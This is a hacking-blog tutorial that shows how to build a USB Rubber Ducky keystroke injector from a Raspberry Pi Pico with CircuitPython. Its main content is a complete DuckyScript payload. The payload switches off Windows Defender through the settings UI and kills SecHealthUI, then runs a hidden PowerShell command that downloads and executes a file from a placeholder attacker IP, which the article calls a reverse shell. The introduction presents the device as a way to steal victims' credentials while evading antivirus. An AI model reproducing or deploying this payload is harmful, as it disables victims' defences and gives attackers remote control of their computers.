Sploitech

How To Create USB Rubber Ducky With Raspberry Pi Pico

Pico-Ducky

What Is USB Rubber Ducky

USB Rubber ducky is an HID (Human Interface Device) device that looks similar to a USB Pen drive. It may be used to inject keystrokes into a system, used to hack a system, steal victim’s essential and credential data can inject payload to the victim’s computers. The main important thing about USB Rubber ducky is that it cannot be detected by any Anti-Virus or Firewall as it acts as an HID device.

Tools & Software Required:

  • One operating system to configure pico-ducky. (Windows 10)
  • Raspberry Pi Pico
  • CircuitPython

Recommended RPI:

Configuring Raspberry Pi Pico

First, we need to set up the raspberry pi pico to show up as a hid device. The steps to configure:

Step 1:

  • Download CircuitPython
  • Plug your raspberry pi pico into your pc.
  • Copy & paste the downloaded .uf2 in the raspberry pi pico.
  • Unplug and plug your raspberry pi pico once again.

Now your Raspberry pi pico will reconnect as the CircuitPython.

Step 2:

  • Now for making the raspberry pi pico pretend to be a hid device we have to download the hid library.
  • Hid Library Download link adafruit-circuitpython-bundle-6.x-mpy-20210130.zip
  • Now extract the folder which you have downloaded.
  • After the folder has been extracted open the folder and go to the ⇒ lib ⇒ adafruit_hid
  • Now copy the adafruit_hid folder and paste it into the raspberry pi pico ⇒ lib folder.

Step 3:

  • Now we have to delete the code.py file from raspberry pi pico.
  • After deletion, we have to download the python file which will convert our payload. File Download Link ⇒ pico-ducky
  • After the download is completed open the folder and copy & paste the duckyinpython.py file to the raspberry pi pico.
  • Now we have to rename the duckyinpython.py file to the code.py.

🥳 Congrats now your raspberry pi pico is a USB rubber ducky.

Using Payload With The Pico-Ducky

Now that we have configured our raspberry pi pico to work as a USB rubber ducky we have to upload a payload that will work when the pico is plugged into a pc.

Step 1: Open notepad and paste any script available at Github hak5darren/USB-Rubber-Ducky for now, I will be using my own script which is given below.

Step 2: Now when you are going to save the file. Change the save as type to ALL FILES and rename the file to payload.dd and save the file to the raspberry pi pico.

!!Warning: As soon as you are going to save the file it is going to run the script.

This script below will turn off windows defender then clear the action center & create a reverse shell↓.

				
					REM tested on: Windows 10 
REM author: sploitech.com
REM turn off windows defender then clear action center & create a reverse shell
REM article URL: https://sploitech.com/raspberry-pi-projects/how-to-create-usb-rubber-ducky-with-raspberry-pi-pico/
REM This script is for educational purpose only.

GUI
DELAY 250
STRING Windows Defender Settings
DELAY 200
ENTER
DELAY 3000
ENTER
DELAY 1500
TAB
REPEAT 3
ENTER
DELAY 500
SPACE
DELAY 2500
LEFT
ENTER
TAB
SPACE
DELAY 500
TAB
SPACE
DELAY 500
TAB
SPACE
TAB
TAB
SPACE
GUI
DELAY 500
STRING Command Prompt
DELAY 200
ENTER
DELAY 1000
STRING taskkill/im SecHealthUI.exe -F
ENTER
DELAY 100
STRING exit
ENTER
DELAY 2000
GUI + a
DELAY 500
TAB
REPEAT 4
DELAY 500
ENTER
GUI + a
DELAY 150
GUI r
DELAY 1000
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://<I.p_address>/<shell_name>','%TEMP%\<shell_name>');Start-Process "%TEMP%\<shell_name>"
ENTER
				
			

You will have to enter your own payload location on the highlighted line no. 56.

Link to other types of payload:

Github hak5darren/USB-Rubber-Ducky

Conclusion

The raspberry pi pico is great and can run many payloads but it has two downsides:

  1. It uses a micro USB to USB converter cable.
  2. When connected it shows as both hid device and mass storage device. 

The first one can be solved using custom PCB for the pico-ducky.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

5 Responses

    1. If your payload is not working you can try these steps:
      1. Try to run any basic script like printing “hello world”.

      Copy and paste this script it will open notepad and print hello world:
      GUI
      DELAY 500
      STRING Notepad
      ENTER
      DELAY 500
      STRING Hello World

      2. Check if the file extension is .dd or not.
      3. Try to format your pi and reflash the files by pressing the white button and plugging your pi into your pc.
      4. Check in the lib folder that your adafruit_hid file is present or not
      If the hello world script works it means it is having a problem with my script. That shouldn’t happen but if it is not working it means there is a problem with the code.py or the hid file. Let me know if it works.

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.